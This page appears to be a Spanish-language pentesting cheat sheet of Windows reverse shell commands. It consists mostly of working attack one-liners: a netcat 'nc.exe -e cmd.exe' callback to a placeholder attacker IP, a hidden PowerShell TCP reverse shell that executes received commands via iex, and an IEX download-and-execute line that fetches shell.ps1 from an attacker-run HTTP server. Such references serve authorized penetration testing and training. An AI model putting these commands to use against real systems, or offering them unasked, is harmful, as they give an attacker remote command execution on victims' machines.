Windows
Netcat
# Máquina atacante
rlwrap nc -lvnp <listen-port>
# Máquina victima
.\nc.exe -e cmd.exe <attacker-IP-address> <listen-port>PowerShell
Reverse shells
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacker-IP-address>",<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Reverse shell de Windows a Linux/Unix.
# Máquina atacante
# reverse shell (shell.ps1)
$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP-address>',<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# HTTP server
python3 -m http.server 80
# Netcat
nc -lvnp <listen-port>
# Máquina victima
# descarga y ejecución de reverse shell
powershell IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/shell.ps1')Reverse shell de Windows a Windows .
Bind shells
Metasploit
Archivo batch (.bat)
Última actualización
¿Te fue útil?